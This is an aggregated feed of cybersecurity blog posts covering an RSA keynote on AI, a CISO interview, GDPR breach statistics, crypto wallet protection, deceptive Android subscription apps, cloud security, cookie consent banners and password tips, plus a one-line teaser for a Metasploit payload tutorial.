Additional GTI coverage exists for email-based attacks, in tandem with the Suspicious Attachment feature. When this feature is enabled, Artemis![Partial hash] detections will occur on known exploits.

Update: An earlier version of this article used the phrase User Access Control (UAC) which has now been changed to User Account Control (UAC) and the term “bypass” which has now been changed to “does not apply.”

The post Attackers Exploiting WinRAR UNACEV2.DLL Vulnerability (CVE-2018-20250) appeared first on McAfee Blogs.

McAfee CTO @ RSA: Catching Lightning in a Bottle or Burning Bridges to the Future?

I spoke last week at the RSA Conference in San Francisco on the subject of AI related threats and opportunities in the cybersecurity field. I asserted that innovations such as AI can strengthen our defenses but can also enhance the effectiveness of a cyber attacker.  I also looked at some examples of underlying fragility in AI that enable an attacker opportunity to evade AI based defenses. The key to successfully unlocking the potential of AI in cybersecurity requires that we in the cybersecurity industry answer the question of how we can nurture the sparks of AI innovation while recognizing its limitations and how it can be used against us.

We should look to the history of key technological advances to better understand how technology can bring both benefits and challenges. Consider flight in the 20th century. The technology has changed every aspect of our lives, allowing us to move between continents in hours, instead of weeks. Businesses, supply chains, and economies operate globally, and our ability to explore the world and the universe has been forever changed.

But this exact same technology also fundamentally changed warfare. In World War II alone, the strategic bombing campaigns of the Allied and Axis powers killed more than two million people, many of them civilians.

The underlying technology of flight is Bernoulli’s Principle, which explains why an airplane wing creates lift. Of course, the technology in play has no knowledge of whether the airplane wing is connected to a ‘life-flight’ rescue mission, or to a plane carrying bombs to be dropped on civilian targets.

When Orville Wright was asked in 1948 after the devastation of air power during World War II whether he regretted inventing the airplane he answered:

“No, I don’t have any regrets about my part in the invention of the airplane, though no one could deplore more than I do the destruction it has caused. We dared to hope we had invented something that would bring lasting peace to the earth. But we were wrong. I feel about the airplane much the same as I do in regard to fire. That is, I regret all the terrible damage caused by fire, but I think it is good for the human race that someone discovered how to start fires, and that we have learned how to put fire to thousands of important uses.”

Orville’s insight that technology does not comprehend morality—and that any advances in technology can be used for both beneficial and troubling purposes.  This dual use of technology is something our industry has struggled with for years.

Cryptography is a prime example. The exact same algorithm can be used to protect data from theft, or to hold an individual or organization for ransom. This matters more than ever given that we now encrypt 75% of the world’s web traffic, protecting over 150 exabytes of data each month.  At the same time, organizations and individuals are enduring record exploitation through ransomware.

The RSA Conference itself was at the epicenter of a debate during the 1990’s on whether it was possible to conditionally use strong encryption only in desirable places, or only for desirable functions.  At the time, the U.S. government classified strong encryption as a munition along with strict export restrictions.   Encryption is ultimately just math and it’s not possible to stop someone from doing math.  We must be intellectually honest about our technologies; how they work, what the precursors to use them are and when, how and if they should be contained.

Our shared challenge in cybersecurity is to capture lightning in a bottle, to seize the promise of advances like flight, while remaining aware of the risks that come with technology.  Let’s take a closer look at that aspect.

History repeats itself

Regardless of how you define it, AI is without a doubt the new foundation for cybersecurity defense. The entire industry is tapping into the tremendous power that this technology offers to better defend our environments. It enables better detection of threats beyond what we’ve seen in the past, and helps us out-innovate our cyber adversaries. The combination of threat intelligence and artificial intelligence, together or human-machine teaming provides us far better security outcomes—faster—than either capability on their own.

Not only does AI enable us to build stronger cyber defense technology, but also helps us solve other key issues such as addressing our talent shortage. We can now delegate many tasks to free up our human security professionals to focus on the most critical and complex aspects of defending our organizations.

“It’s just math..”

Like encryption, AI is just math. It can enhance criminal enterprises in addition to its beneficial purposes. McAfee Chief Data Scientist Celeste Fralick joined me on stage during this week’s keynote to run through some examples of how this math can be applied for good or ill. (visit here to view the keynote).  From machine learning fueled crime-spree predictors to DeepFake videos to highly effective attack obfuscation, we touch on them all.

It’s important to understand that the cybersecurity industry is very different from other sectors that use AI and machine learning. For a start, in many other industries, there isn’t an adversary trying to confuse the models.

AI is extremely fragile, therefore one focus area of the data science group at McAfee is Adversarial Machine Learning. Where we’re working to better understand how attackers could try to evade or poison machine learning models.  We are developing models that are more resilient to attacks using techniques such as feature reduction, adding noise, distillation and others.

AI and False Positives: A Warning

We must recognize that this technology, while incredibly powerful, is also incredibly different from what many cybersecurity defenders worked with historically. In order to deal with issues such as evasion, models will need to be tuned to high levels of sensitivity. The high level of sensitivity makes false positives inherent and something we must fully work into the methodology for using the technology.

False positive can have catastrophic results.  For an excellent example of this, watch the video of the keynote here if you haven’t seen it yet.  I talk through the quintessential example of how a false positive almost started World War III and nuclear Armageddon.

The Take-Away

As with fire and flight, how we manage new innovations is the real story.  Recognizing technology does not have a moral compass is key.  Our adversaries will use the technology to make their attacks more effective and we must move forward with our eyes wide open to all aspects of how technology will be used…. Its benefits, limitations and how it will be used against us.

 

Please see the video recording of our keynote speech RSA Conference 2019: https://www.rsaconference.com/events/us19/presentations/keynote-mcafee

 

The post McAfee CTO @ RSA: Catching Lightning in a Bottle or Burning Bridges to the Future? appeared first on McAfee Blogs.

Moving Up: An Interview with Jadee Hanson

Jadee Hanson, CISO, Code 42

What does it take to build a security program from scratch, in a company without any existing security initiatives in place? To answer this question, we spoke with Jadee Hanson, Code 42’s CISO, whose builder mentality translates into everything she does.

 Q:  How did you first become interested in the cybersecurity industry?

A:  I was always very interested in technology in high school and I had a mentor that saw my interest.  He was the technology coordinator for our entire school district, and I worked for him a few days a week.  We would buy all sorts of different computer parts and then assemble the lab’s computers.  He taught me the basics for everything that falls under the information technology umbrella.

After graduation, I worked for Deloitte in their enterprise risk services team.  Deloitte was on the leading edge of cyber risk.  I was doing pen testing when companies didn’t know what a pen test was.  It was a great opportunity that transitioned me from IT into cybersecurity and spurred a deeper interest in the industry that never went away.

Q:  What was it about the industry that attracted you to it?

A:  What I found fascinating with cybersecurity was this notion of the bad guy—an adversary trying to do something bad to a company.  In cybersecurity, the mission is to figure out how to protect against those adversaries.

Another appeal was that at the time, people didn’t really understand what cybersecurity was.  I was the first to raise my hand for any cybersecurity engagement.

“I think I was naturally drawn to the industry because it was new, which allowed me the chance to build programs from scratch.  My mentors commonly describe me as a builder, with the ability to take something from nothing and build a robust process and program around it.”  

Q:  How did this mentality as a “builder” help you as you progressed in your career?

A:  When I worked at Target, I got to leverage many of the skills I had in building programs.  We built risk functions, security operations functions, and training awareness functions.  All of these different functions needed to be in place in order to have an effective security program.

Then, when I started at Code 42, there was a lot to do, a lot to change and a lot to build, so this was my next project, essentially.

Q:  Your ability to see gaps and build solutions seems to carry into your life outside of work.  Can you tell me a bit about how you started your nonprofit, Building without Borders?

A:  I first visited the Dominican Republic in 2004 with my husband, but then when I came home, I had kids and got busy.  In 2010, however, I went back with my sister on a mission trip.  There we built houses, met families, and ran a children’s program.  Coming home, though, I realized it wasn’t enough—I couldn’t just go there once a year and not do more.

“I realized there was this major problem, and there was something I could do about it.”

As of now, we’ve built 39 houses there and have initiated a healthcare program as well as food delivery.  It’s been really rewarding to see the change in the community and the people there.  They now feel supported and hopeful, not abandoned.

Q:  How do you think companies could encourage more people, specifically women, to enter the industry?

A:  We have to start encouraging participation at the next generation of workers.  One of the ways we do this at Code42 is through a partnership with Girl Scouts.  We house Girl Scouts here to get their STEM Badge or Cybersecurity Badge.  In fact, we’re the first company within the River Valley region of Girl Scouts to host the Cybersecurity Badge.  They’re not all going to choose a career in cybersecurity, but the thing that we’re trying to do is make sure that the younger generation knows and believes that if they do want to choose this career path, there’s a place for them.

Q:  What advice do you have for anyone interested in starting a career in the cybersecurity industry?

A:  Confidence is key.  You know your worth, and you know what you can do, so be confident in who you are and what you bring to the table.

To learn more about or donate to Building Without Borders, click here.
And be sure to check out our Women in Cybersecurity Series for more great advice.

The post Moving Up: An Interview with Jadee Hanson appeared first on GRA Quantum.

Five data protection tips from the DPC’s annual report

The first post-GDPR report from the Data Protection Commission makes for interesting reading. The data breach statistics understandably got plenty of coverage, but there were also many pointers for good data protection practice. I’ve identified five of them which I’ll outline in this blog.

Between 25 May and 31 December 2018, the DPC recorded 3,542 valid data security breaches. (For the record, the total number of breaches for the calendar year was 4,740.) This was a 70 per cent increase in reported valid data security breaches compared to 2017 (2,795), and a 56 per cent increase in public complaints compared to 2017.

1. Watch that auto-fill!

By far the largest single category was “unauthorised disclosures”, which was 3,134 out of the total. Delving further, we find that many of the complaints to the DPC relate to unauthorised disclosure of personal data in an electronic context. In other words, an employee at a company or public sector agency sent email containing personal data to the wrong recipient.

Data breaches in Ireland during 2018 and their causes

A case study on page 21 of the report illustrates this point: a data subject complained to the DPC after their web-chat with a Ryanair employee “was accidentally disclosed by Ryanair in an email to another individual who had also used the Ryanair web-chat service. The transcript of the webchat contained details of the complainant’s name and that of his partner, his email address, phone number and flight plans”.

It’s a common misconception that human error doesn’t count as a data breach, but in the eyes of GDPR, this isn’t the case. The most common reason for breaches like this comes from the auto-fill function in some software applications like email clients.

Where an organisation deals with high-risk data like healthcare information (because of the sensitivity involved), best practice is to disable auto-fill. I recommend this step to many of my clients. Many organisations don’t like doing this because it disrupts staff and makes their jobs a little bit harder. In my experience, employees soon get used to the inconvenience, while organisations greatly reduce their chances of a breach.

2. Encrypted messaging may not be OK

Another misconception I hear a lot is that it’s OK to use WhatsApp as a messaging tool because it’s encrypted. The case study on page 19 of the DPC report clarifies this position. A complainant claimed the Department of Foreign Affairs and Trade’s Egypt mission had shared his personal data with a third party (his employer) without his knowledge. A staff member at the mission was checking the validity of a document and the employer had no email address, so they sent a supporting document via WhatsApp.

In this case, the DPC “was satisfied that given the lack of any other secure means to contact the official in question, the transmission via WhatsApp was necessary to process the personal data for the purpose provided (visa eligibility)”.

My reading of this is that although the DPC ruled that WhatsApp was sufficient in this case, this was only because no other secure means of communication was available.

3. Do you need a DPO?

The report tells us that there were 900 Data Protection Officers appointed between 25 May and 31 December 2018. My eyes were immediately drawn to some text accompanying that graph (below). “During 2019, the DPC plans to undertake a programme of work communicating with relevant organisations regarding their obligations under the GDPR to designate a DPO.” This suggests to me that the DPC doesn’t believe there are enough DPOs, hence the outreach and awareness-raising efforts.

Notifications of new DPOs between 25 May and 31 December 2018

Private and public organisations will need to decide whether they should appoint a full-time DPO or avail of a service-model from a third-party data protection specialist.

4. A data protection policy is not a ‘get out of jail free’ card

Case study 9 from the report concerns an employee of a public-sector body who lost an unencrypted USB device. The device contained personal information belonging to a number of colleagues and service users. The data controller had policies and procedures in place that prohibited the removal and storage of personal data on unencrypted devices. But the DPC found that it “lacked the appropriate oversight and supervision necessary to ensure that its rules were complied with”.

The lesson I take from this is, “user error” is not a convenient shield for all data protection shortcomings. Many organisations expended effort last year in writing policies, and some think they’re covered from sanction because they did so. But unless they implement and enforce the policy – and provide training to staff about it – then it’s not enough.

5. Email marketing penalties may change

My final point is more of an observation than advice. Between 25 May and 31 December, the DPC prosecuted five entities for 30 offences involving email marketing. The reports detail those cases. A recurring theme is that the fines were mostly in the region of a couple of thousand euro. However, all of these cases began before GDPR was in force; since then, the DPC has the power to levy fines directly rather than going through the courts. This is an area I expect the DPC to address. Any organisation that took a calculated risk in the past because the fines were low should not expect this situation will continue.

There are plenty of other interesting points in the 104-page report, which is free to download here.

The post Five data protection tips from the DPC’s annual report appeared first on BH Consulting.

Tackling The Weaknesses Outside The Blockchain System To Protect Your Cryptocurrency

protect cryptocurrency blockchain

There’s a general consensus in the crypto industry that blockchain cannot be hacked. This is because blockchain transactions listed on the distributed ledgers are immutable meaning they cannot be erased, changed or configured.

The distributed general system also has accountability in place so that all transactions distributed across each node must be the same in order to achieve consensus.

The blockchain so far have proven to be impossible to hack, but organizations are using blockchain in ways that involve elements outside the blockchain itself, such as crypto wallets.   

Because these elements exist outside the scope of the blockchain, they are susceptible to common web vulnerabilities, hackings, and other human errors. Therefore, if a transaction is handled improperly, it can be unintentionally listed as an official transaction.

For example, tokens stored in a wallet or an exchange whose website isn’t secure can lead to hacking episode and ultimately the withdrawal of tokens, which will be recorded on the distributed ledgers as valid transactions when they are not.

So what are companies and users left to do in protecting crypto assets?

While blockchain technology offers interesting security alternatives to cybersecurity in general, that does not mean traditional cybersecurity solutions and other cyber practices are obsolete in protecting against attacks that ultimately target cryptocurrency.

Check out our tips in protecting against some of the most common cyber hacks in the crypto world.

Web Attacks

Wallets don’t actually contain any crypto; instead they hold a private key, which is needed to access, withdraw, or trade it. Wallets are not protected by the same technology that makes blockchain essentially “unhackable.”

The same goes for crypto exchanges which is why we advise users to avoid holding significant amounts of coins on any exchange. Wallets and exchanges are also vulnerable to web attacks such as SQL injection and Cross-Site Scripting (XSS) attacks.

Hackers, for example, can launch SQL attacks to exploit a vulnerability in data input forms by inputting a malicious code into the login pages of a website or web app, thus revealing sensitive data like the private keys of wallets.

XSS attacks can be used by hackers to intercept information including login details between a client and server by executing a malicious code.

While these attacks can easily be thwarted off with a WAF, which monitors web traffic at the web application layer in the background and blocks malicious agents automatically, there are other ways end users can protect themselves.

As an end user, we highly recommend you to utilize “cold” wallets such as a ledger so that your private keys are stored offline unlike “hot” wallets which are always connected to the internet and are prone to hacking.

We also recommend users to write down their private keys in a safe location since anyone that gets hold of your mnemonic phrases can access your wallets.

Malware

Wallet addresses contain a long string of both numbers and letters (up to 21 characters) and are difficult to memorize. When users want to transfer funds to another wallet, most opt to copy and paste wallet addresses, but this shortcut creates an opportunity for certain malware to exploit it.

Though not entirely new in its execution, a trojan has been discovered that monitors over 2.3 million different crypto addresses and works by exploiting the clipboard function. It replaces the intended recipient wallet address with that of the attacker’s.

A similar malicious software called CryptoShuffler follows this trend and is known to also manipulate wallet addresses.

Unfortunately, these actions often go unnoticed by users, which puts them at risk when transferring funds. To protect against such malware, it’s important for users to keep their antivirus software and operating systems up to date, perform regular malware scans, and avoid installing untrusted software.

We also recommend users to always double check the intended recipient address prior to transferring any funds. A good tip is checking the first and last characters to see if they match the rightful wallet address.

Smart contracts

Smart contracts are commonly used to facilitate and conduct credible transactions on the blockchain without intermediaries.

Because they are directly tied to these transactions, they can hold massive amounts of digital currencies, making them a lucrative target for hackers.

Error codes or bugs in the smart contract can result in crypto being frozen or stolen by hackers.

In some rare occasions, hackers can also gain direct access to a smart contract by obtaining the private key to steal funds and then replacing addresses with fraudulent ones.

Utilizing external auditors can help to inspect the code for any vulnerabilities. For organizations, we recommend finding reputable auditors who have a track record in protecting against such attacks or errors.

Fake Apps and Classic Phishing

Phishing takes all kinds of forms in the crypto world. Most phishing scams aim to either steal credentials to access wallets or trick users into sending crypto directly to addresses of scammers or hackers.

The ways in which hackers “phish” for new victims are many.

This includes hackers cloning websites that mimic legitimate exchange sites or malicious crypto apps to steal personal information including wallet credentials.

There are also bots that notify users about issues with their crypto but are actually malicious and used to steal crypto, and not to mention the usage of Telegram to pose as ICO team members and then asking users to invest and send crypo to fraudulent addresses.

Another rising trend among scammers is figuring out how to bypass 2FA by duping telecom companies into sending verification codes to the phone numbers of scammers. This grants them access to authentication on crypto accounts and exchanges.

These types of social engineering tactics are highly prevalent. Taking extra precaution while whether it’s discussing, investing, or transferring crypto is absolutely necessary as anyone can fall victim to classic phishing scams.

Conclusion

Unlike banks which offer standard protections and insurances for customers, the blockchain cannot offer the same luxury to crypto holders.

Elements outside the blockchain make it difficult for companies and users using blockchain to remain entirely protected. Protecting these elements, namely crypto wallets and exchanges, is one of the biggest challenges in blockchain security .

A proper cyber defense strategy will seek to incorporate traditional solutions like using antivirus software and running malware scans, but it’s also equally important to use common sense when dealing with anything crypto.

 


Make sure to follow us on our social media platforms (LinkedInTwitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post Tackling The Weaknesses Outside The Blockchain System To Protect Your Cryptocurrency appeared first on Cloudbric.

Basic Android Apps Are Charging High Subscription Fees With Deceptive Tactics

Free apps have a lot of appeal for users. They don’t cost a cent and can help users complete tasks on-the-go. However, users should take precautions before installing any app on their device. Researchers here at McAfee have observed some Android apps using extremely deceptive techniques to try and trick users into signing up for a very expensive service plan to use basic tool functionalities like voice recording and opening zip files.

The two apps being called into question, “Voice recorder free” and “Zip File Reader,” have been downloaded over 600,000 times combined. So at first glance, users may assume that these are reputable apps. Once installed, they offer the user an option to use a “Free trial” or to “Pay now.” If the user selects the trial version, they are presented with a subscription page to enter their credit card details for when the three-day trial is over. However, these apps charge a ridiculously high amount once the trial is up. “Voice recorder free” charges a whopping $242 a month and “Zip File Reader” charges $160 a week.

Users who have downloaded these apps and then deleted them after their free trial may be surprised to know that uninstalling the app will not cancel the subscription, so they could still be charged these astronomical amounts for weeks without realizing it. While this is not technically illegal, it is a deceptive tactic that app developers are using to try to make an easy profit off of consumers who might forget to cancel their free trial.

With that said, there are a few things users can do to avoid becoming victim to deceptive schemes such as these in the future. Here are some tips to keep in mind when it comes to downloading free apps:

  • Be vigilant and read app reviews. Even if an app has a lot of downloads, make sure to comb through all of the reviews and read up before downloading anything to your device.
  • Read the fine print. If you decide to install an app with a free trial, make sure you understand what fees you will be charged if you keep the subscription.
  • Remember to cancel your subscription. If you find a reputable free app that you’ve researched and want to use for a trial period, remember to cancel the subscription before uninstalling the app off your device. Instructions on canceling, pausing, and changing a subscription can be found on Google Play’s Help page.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Basic Android Apps Are Charging High Subscription Fees With Deceptive Tactics appeared first on McAfee Blogs.

Thoughts on Cloud Security

Recently I've been reading about cloud security and security with respect to DevOps. I'll say more about the excellent book I'm reading, but I had a moment of déjà vu during one section.

The book described how cloud security is a big change from enterprise security because it relies less on IP-address-centric controls and more on users and groups. The book talked about creating security groups, and adding users to those groups in order to control their access and capabilities.

As I read that passage, it reminded me of a time long ago, in the late 1990s, when I was studying for the MCSE, then called the Microsoft Certified Systems Engineer. I read the book at left, Windows NT Security Handbook, published in 1996 by Tom Sheldon. It described the exact same security process of creating security groups and adding users. This was core to the new NT 4 role based access control (RBAC) implementation.

Now, fast forward a few years, or all the way to today, and consider the security challenges facing the majority of legacy enterprises: securing Windows assets and the data they store and access. How could this wonderful security model, based on decades of experience (from the 1960s and 1970s no less), have failed to work in operational environments?

There are many reasons one could cite, but I think the following are at least worthy of mention.

The systems enforcing the security model are exposed to intruders.

Furthermore:

Intruders are generally able to gain code execution on systems participating in the security model.

Finally:

Intruders have access to the network traffic which partially contains elements of the security model.

From these weaknesses, a large portion of the security countermeasures of the last two decades have been derived as compensating controls and visibility requirements.

The question then becomes:

Does this change with the cloud?

In brief, I believe the answer is largely "yes," thankfully. Generally, the systems upon which the security model is being enforced are not able to access the enforcement mechanism, thanks to the wonders of virtualization.

Should an intruder find a way to escape from their restricted cloud platform and gain hypervisor or management network access, then they find themselves in a situation similar to the average Windows domain network.

This realization puts a heavy burden on the cloud infrastructure operators. They major players are likely able to acquire and apply the expertise and resources to make their infrastructure far more resilient and survivable than their enterprise counterparts.

The weakness will likely be their personnel.

Once the compute and network components are sufficiently robust from externally sourced compromise, then internal threats become the next most cost-effective and return-producing vectors for dedicated intruders.

Is there anything users can do as they hand their compute and data assets to cloud operators?

I suggest four moves.

First, small- to mid-sized cloud infrastructure users will likely have to piggyback or free-ride on the initiatives and influence of the largest cloud customers, who have the clout and hopefully the expertise to hold the cloud operators responsible for the security of everyone's data.

Second, lawmakers may also need improved whistleblower protection for cloud employees who feel threatened by revealing material weaknesses they encounter while doing their jobs.

Third, government regulators will have to ensure no cloud provider assumes a monopoly, or no two providers assume a duopoloy. We may end up with the three major players and a smattering of smaller ones, as is the case with many mature industries.

Fourth, users should use every means at their disposal to select cloud operators not only on their compute features, but on their security and visibility features. The more logging and visibility exposed by the cloud provider, the better. I am excited by new features like the Azure network tap and hope to see equivalent features in other cloud infrastructure.

Remember that security has two main functions: planning/resistance, to try to stop bad things from happening, and detection/respond, to handle the failures that inevitably happen. "Prevention eventually fails" is one of my long-time mantras. We don't want prevention to fail silently in the cloud. We need ways to know that failure is happening so that we can plan and implement new resistance mechanisms, and then validate their effectiveness via detection and response.

Update: I forgot to mention that the material above assumed that the cloud users and operators made no unintentional configuration mistakes. If users or operators introduce exposures or vulnerabilities, then those will be the weaknesses that intruders exploit. We've already seen a lot of this happening and it appears to be the most common problem. Procedures and tools which constantly assess cloud configurations for exposures and vulnerabilities due to misconfiguration or poor practices are a fifth move which all involved should make.

A corollary is that complexity can drive problems. When the cloud infrastructure offers too many knobs to turn, then it's likely the users and operators will believe they are taking one action when in reality they are implementing another.

In da House (of Representatives)

Recently, the US Congress met to discuss privacy protections from the perspective of a federal regulation. One of the most discussed topics was GDPR and whether it works or not. A lot was said, and I was pretty disappointed with the overall lack of nuance with regards to understanding what privacy is about from sitting […]

The post In da House (of Representatives) appeared first on Privacy Ref Blog.

These Cookie Warning Shenanigans Have Got to Stop

These Cookie Warning Shenanigans Have Got to Stop

This will be short, ranty and to the point: these warnings are getting ridiculous:

These Cookie Warning Shenanigans Have Got to Stop

I know, tell you something you don't know! The whole ugly issue reared its head again on the weekend courtesy of the story in this tweet:

The reason I don't know if it makes it better or worse is that on the one hand, it's ridiculous that in a part of the world that's more privacy-focused than most it essentially boils down to "take this cookie or no access for you" whilst on the other hand, the Dutch DPA somehow thinks that this makes any sense to (almost) anyone:

And the Dutch DPA’s guidance makes it clear internet visitors must be asked for permission in advance for any tracking software to be placed — such as third-party tracking cookies; tracking pixels; and browser fingerprinting tech — and that that permission must be freely obtained. Ergo, a free choice must be offered.

Is this really what we want? To continue chucking up cookie warnings to everyone and somehow expecting them to make an informed decision about the risks they present? 99% of people are going to click through them anyway (note: this is a purely fabricated figure based on the common-sense assumption that people will generally click through anything that gets in the way of performing the task they set out to complete in the first place). And honestly, how on earth is your average person going to make an informed decision on a message like this:

Do you know how hard it is to explain OAuth to technical people, let alone the masses? Oh wait - it's not OAuth - it's Oath but even I didn't get that at first because nobody really reads these warnings anyway! And now that I have read it and I know it's Oath, what does that really mean? Oh look, a big blue button that will make it all go away and allow me to do what I came here for in the first place...

But say you are more privacy focused and you wanted to follow that link in the original tweet. Here's your fix:

These Cookie Warning Shenanigans Have Got to Stop

And if you're smart enough to actually understand what cookies are and be able to make an informed decision when prompted with a warning like TechCrunch's, then you're smart enough to know how to right click on a link and open it incognito. Or run an ad blocker. Or something like a Pi-hole.

Or you move to Australia because apparently, we don't deserve the same levels or privacy down here. Or have I got that back to front and Europeans don't deserve the same slick UX experience as we get down here? You know, the one where you click on a link to read an article and you actually get to read the article!

So let's be European for a moment and see how that experience looks - let's VPN into Amsterdam and try to control my privacy on TechCrunch:

These Cookie Warning Shenanigans Have Got to Stop

Are you fucking serious? This is what privacy looks like? That's 224 different ad networks that are considered "IAB Partners" (that'd be the Interactive Advertising Bureau) and I can control which individual ones can set cookies. And that's in addition to the 10 Oath foundational partners:

These Cookie Warning Shenanigans Have Got to Stop

You can't disable any of those either by the look of it so yeah, no privacy on that front. But at least you can go and read their privacy policy, right? Sure, Unruly's is 3,967 words, Facebook's is 4,498 words and Zentrick's is another 3,805 words. Oh - and remember that you need to accept cookies on each one of those sites too and you're going to want to read about how they and their partners track you...

These Cookie Warning Shenanigans Have Got to Stop

And the ridiculous thing about it is that tracking isn't entirely dependent on cookies anyway (and yes, I know the Dutch situation touched on browser fingerprinting in general too). Want to see a perfect example? Have a go of Am I Unique and you'll almost certainly be told that "Yes! You can be tracked!":

These Cookie Warning Shenanigans Have Got to Stop

Over one million samples collected and yet somehow, I am a unique snowflake that can be identified across requests without a cookie in sight. How? Because even though I'm running the current version of Chrome on the current version of Windows, less than 0.1% of people have the same user agent string as me. Less than 0.1% of people also have their language settings the same as mine. Keep combining these unique attributes and you have a very unique fingerprint:

These Cookie Warning Shenanigans Have Got to Stop

The list goes on well beyond that screen grab too - time zone, screen resolution and even the way the canvas element renders on the page. It's kinda cool in a kinda creepy way.

And here's the bit that really bugs me (ok, it all bugs me but this is the worst): how do we expect your normal everyday person to differentiate between cookie warnings and warnings like these:

These Cookie Warning Shenanigans Have Got to Stop
These Cookie Warning Shenanigans Have Got to Stop

I know what these are and you probably do too by virtue of being on this blog, but do you really think most people who have been conditioned to click through the warning that's sitting between them and the content they wish to read understand the difference between this and a cookie warning? We literally have banks telling people just to ignore these warnings:

So in summary, everyone clicks through cookie warnings anyway, if you read them you either can't understand what they're saying or the configuration of privacy settings is a nightmare, depending on where you are in the world you either don't get privacy or you don't get UX hell, if you understand the privacy risks then it's easy to open links incognito or use an ad blocker, you can still be tracked anyway and finally, the whole thing is just conditioning people to make bad security choices. That is all.

e-Crime & Cybersecurity Congress: Cloud Security Fundamentals

I was a panellist at the e-Crime & Cybersecurity Congress last week, the discussion was titled 'What's happening to your business? Cloud security, new business metrics and future risks and priorities for 2019 and beyond", a recap of the points I made.
Cloud is the 'Default Model' for Business
Cloud is now the default model for IT services in the UK; cloud ticks all the efficiency boxes successful business continually craves. Indeed, the 'scales of economy' benefits are not just most cost-effective and more agile IT services, but also include better cybersecurity (by the major cloud service providers), even for the largest of enterprises. It is not the CISO's role to challenge the business' cloud service mitigation, which is typically part of a wider digital transformation strategy, but to ensure cloud services are delivered and managed to legal, regulatory and client security requirements, and in satisfaction of the board's risk appetite, given they ultimately own the cybersecurity risk, which is an operational business risk.

There are security pitfalls with cloud services, the marketing gloss of 'the cloud' should not distract security professionals into assuming IT security will be delivered as per the shiny sales brochure, as after all, cloud service providers should be considered and assessed in the same way as any other traditional third-party IT supplier to the business.

Cloud Security should not be an afterthought

It is essential for security to be baked into a new cloud services design, requirements determination, and in the procurement process. In particular, defining and documenting the areas of security responsibility with the intended cloud service provider.

Cloud does not absolve the business of their security responsibilities

All cloud service models, whether the standard models of Infrastructure as a Service (IaaS), Platform as a Service (PaaS) or Software as a Service (SaaS), always involve three areas of security responsibilities to define and document:
  • Cloud Service Provider Owned
  • Business Owned
  • Shared (Cloud Service Provider & Business)
For example with a PaaS model, the business is fully responsible for application deployment onto the cloud platform, and therefore the security of applications. The cloud service provider is responsible for the security of the physical infrastructure, network and operating system layers. The example of the 'shared' responsibility with this model, are the processes in providing and managing privileged operating system accounts within the cloud environment.

Regardless of the cloud model, data is always the responsibility of the business.


A "Trust but Verify" approach should be taken with cloud service providers when assuring the security controls they are responsible for. Where those security responsibilities are owned by or shared with the cloud service provider, ensure the specific controls and processes are detailed within a contract or in a supporting agreement as service deliverables, then oversight the controls and processes through regular assessments.

5 Tips For Creating Bulletproof Passwords

While biometric tools like facial ID and fingerprints have become more common when it comes to securing our data and devices, strong passwords still play an essential part in safeguarding our digital lives.

This can be frustrating at times, since many of us have more accounts and passwords than we can possibly remember. This can lead us to dangerous password practices, such as choosing short and familiar passwords, and repeating them across numerous accounts. But password safety doesn’t have to be so hard. Here are some essential tips for creating bulletproof passwords.

Remember, simple is not safe

Every year surveys find that the most popular passwords are as simple as  “1234567” and just “password.” This is great news for the cybercrooks, but really bad news for the safety of our personal and financial information.

When it comes to creating strong passwords, length and complexity matter because it makes them harder to guess, and harder to crack if the cybercriminal is using an algorithm to quickly process combinations. The alarming truth is that passwords that are just 7 characters long take less than a third of a second to crack using these “brute force attack” algorithms.

Tricks:

  • Make sure that your passwords are at least 12 characters long and include numbers, symbols, and upper and lowercase letters.
  • Try substituting numbers and symbols for letters, such as zero for “O”, or @ for “A”.
  • If you’re using internet-connected devices, like IP cameras and interactive speakers, make sure to change the default passwords to something unique, since hackers often know the manufacturer’s default settings.

Keep it impersonal

Passwords that include bits of personal information, such as your name, address, or pet’s name, make them easier to guess. This is especially true when we share a lot of personal information online. But you can use personal preferences that aren’t well known to create strong passphrases.

Tricks:

  • Try making your password a phrase, with random numbers and characters. For instance, if you love crime novels you might pick the phrase: ILoveBooksOnCrime
    Then you would substitute some letters for numbers and characters, and put a portion in all caps to make it even stronger, such as: 1L0VEBook$oNcRIM3!
  • If you do need to use personal information when setting up security questions, choose answers that are not easy to find online.
  • Keep all your passwords and passphrases private.

Never reuse passwords

If you reuse passwords and someone guesses a password for one account, they can potentially use it to get into others. This practice has gotten even riskier over the last several years, due to the high number of corporate data breaches. With just one hack, cybercriminals can get their hands on thousands of passwords, which they can then use to try to access multiple accounts.

Tricks:

  • Use unique passwords for each one of your accounts, even if it’s for an account that doesn’t hold a lot of personal information. These too can be compromised, and if you use the same password for more sensitive accounts, they too are at risk.
  • If a website or monitoring service you use warns you that your details may have been exposed, change your password immediately.

Employ a password manager

If just the thought of creating and managing complex passwords has you overwhelmed, outsource the work to a password manager! These are software programs that can create random and complex passwords for each of your accounts, and store them securely. This means you don’t have to remember your passwords – you can simply rely on the password manager to enter them when needed.

Tricks:

  • Look for security software that includes a password manager
  • Make sure your password manager uses multi-factor authentication, meaning it uses multiple pieces of information to identify you, such as facial recognition, a fingerprint, and a password.

Boost your overall security

Now that you’ve made sure that your passwords are bulletproof, make sure you have comprehensive security software that can protect you from a wide variety of threats.

Tricks:

  • Keep you software up-to-date and consider using a web advisor that protects you from accidentally typing passwords into phishing sites.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post 5 Tips For Creating Bulletproof Passwords appeared first on McAfee Blogs.

Create Metasploit Payload in Kali Linux MSFvenom Payload Creator

Create Metasploit Payload in Kali Linux MSFvenom Payload Creator (MSFPC)   Disclaimer Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors of Hackingvision.com will not be […]

The post Create Metasploit Payload in Kali Linux MSFvenom Payload Creator appeared first on HackingVision.

Artificial Intelligence, Machine Learning and More at RSAC 2019

Last week, the RSA Conference painted San Francisco’s Moscone Center purple with the theme ‘Better’, and the cybersecurity industry did not disappoint in making the digital world a better and safer place. Below, we’re sharing a few McAfee highlights from this year’s event.

Behind the Scenes of MGM Resorts’ Digital Transformation at CSA Summit

